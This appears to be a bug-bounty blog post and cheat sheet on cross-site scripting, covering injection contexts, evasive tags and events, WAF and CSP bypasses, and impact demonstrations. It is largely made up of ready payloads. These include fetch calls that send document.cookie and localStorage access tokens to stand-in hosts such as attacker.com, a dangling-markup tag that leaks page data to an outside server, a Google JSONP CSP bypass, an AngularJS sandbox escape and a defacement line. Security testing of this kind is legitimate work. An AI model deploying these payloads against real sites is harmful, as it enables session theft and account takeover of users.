What is Cross-site scripting (XSS)?
It is a web security vulnerability that allows an attacker to compromise the interactions users have with a vulnerable application. It allows bypassing the same-origin policy, which is designed to segregate different websites from each other. These vulnerabilities typically allow an attacker to access any of the data. If the victim user has privileged access within the application, then full control over all application functionality and data could be obtained.
Execution Contexts
Success depends on how you "break" the code where your payload lands.
| Context | Input Situation | Injection Strategy | Reference Payload |
| ----------- | ------------------------ | ----------------------------- | -------------------------------- |
| HTML (Text) | <div>YOU_HERE</div> | Break current tag. | ><svg onload=alert(1)> |
| Attribute | <input value="YOU_HERE"> | Close quotes and add event. | " autofocus onfocus=alert(1) x=" |
| JavaScript | var n = 'YOU_HERE'; | Close variable and statement. | ';alert(1)// |
| URL | <a href="YOU_HERE"> | Use pseudoprotocol. | javascript:alert(1) |Tags (Injection Vectors)
Tier S (Maximum Evasion):
<svg>: Being XML, it allows events likeonloadwithout traditional HTML tags.<iframe>: Usessrcdocto render complete HTML within the parent.<details>: Uses theontoggleevent. Highly effective because many WAFs do not block it due to being "modern."
Tier A (Specific Functionality):
<input>: Combined withautofocusandonfocus, it allows Zero-Click execution.<video>/<audio>: Less monitored than<img>, ideal for usingonerror.<base>: Allows "Dangling Markup" to hijack legitimate scripts.
Tier B (Quick Detection):
<img>: The standard withonerrorfor quick testing.<body>: Useful if you can inject outside existing tags.<style>: For data exfiltration via CSS selectors (useful against CSRF tokens).
Strategic Events (Triggers)
The mechanism that triggers the JavaScript code.
Category 1: Automatic Execution (Zero-Click)
These are preferred for P1/P2 reports.
onload: Fires when the element loads.
- Usage:
<svg onload=...>,<body onload=...>
onerror: Fires when a resource fails to load.
- Usage:
<img src=x onerror=...>,<video src=1 onerror=...>
onfocus (with autofocus): Forces the browser to focus on the element and immediately triggers the JS.
- Usage:
<input onfocus=... autofocus>
onanimationstart: Fires when a CSS animation starts. Very powerful for evading filters looking for "load" or "error".
- Usage: Requires injecting CSS styles (
@keyframes) and assigning the animation to an element.
Category 2: User Interaction (Requires Social Engineering)
Usually pay less unless interaction is unavoidable.
onmouseover/onmouseenter: Requires the mouse to hover over.onclick: The user must click.ontoggle: Exclusive to the<details>tag.onpointerenter: A modern variant of mouseover that is sometimes not on blacklists.
Functions (The Real Impact)
Level: Critical (Account Takeover / Exfiltration)
These functions demonstrate full control over the victim's account.
fetch() / XMLHttpRequest():
- Danger: Allows making requests on behalf of the user without their knowledge.
- Bug Bounty Payload:
fetch('https://your-server.com?cookie='+document.cookie) - Why it pays: Demonstrates massive and silent data exfiltration.
document.cookie:
- Danger: Access to session tokens.
- Bug Bounty Payload:
alert(document.cookie)(only as PoC, better to exfiltrate it). - Note: If cookies have
HttpOnly, this will fail, but you can still demonstrate impact withlocalStorage.
localStorage / sessionStorage:
- Danger: Single Page Applications (React, Vue) usually store JWTs (JSON Web Tokens) here.
- Bug Bounty Payload:
fetch('//attacker.com?token='+localStorage.getItem('access_token')) - Impact: Immediate account theft.
Level: High (Destructive Actions / Redirection)
eval() / setTimeout(string):
- Danger: Execution of arbitrary code from strings.
- Usage: Often used to obfuscate payloads and avoid WAFs looking for specific keywords.
document.body.innerHTML:
- Danger: Defacement.
- Usage:
document.body.innerHTML = '<h1>HACKED</h1>' - Impact: Severe reputational damage to the company.
Reconnaissance and Bypass
- Fingerprinting: Send special characters (
< > " ' ( )) to see which are filtered and which are reflected unchanged. - WAF Bypass: Try using Backticks (
alert`1`) instead of parentheses, or Slashes instead of spaces (<svg/onload=...). - Chaining: If you find an XSS on a subdomain (
dev.target.com), use it to attack session cookies of the main domain (target.com).
Payload Table
CSP Bypass (Content Security Policy)
CSP is a security layer that tells the browser which script sources are trustworthy. If you inject a payload but it doesn't execute, CSP is blocking you.
How to identify it?
Check the response headers or the <meta> tag in the HTML looking for Content-Security-Policy.
Bypass Strategies
A. JSONP Bypass
If the CSP allows large domains like google.com, gstatic.com, or facebook.com, you can use their JSONP endpoints to execute code. These sites return data wrapped in a function that you control.
- Vulnerable endpoint on whitelist:
https://accounts.google.com/o/oauth2/revoke?callback=ALERT- Payload:
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>B. CSP Evaluator & Gadgets
If the policy uses unsafe-eval, you can use libraries already loaded on the site (like jQuery or Angular) to execute scripts.
- AngularJS Bypass: If the site uses Angular, you don't need
<script>. Simply:
<div ng-app>{{constructor.constructor('alert(1)')()}}</div>C. Dangling Markup (Exfiltration without Execution)
If the CSP is so strict that it prevents any JS execution (no inline, no eval), you can still steal data (like CSRF tokens) by injecting an unfinished HTML tag.
- Payload:
<img src='https://atacker.com/log?data= - Effect: The browser will try to load the image and send all the HTML it finds until the next quote as part of the URL to your server.
Connect with me
Support Me ☕
If you found this useful, I would appreciate it if you would follow me and support the content.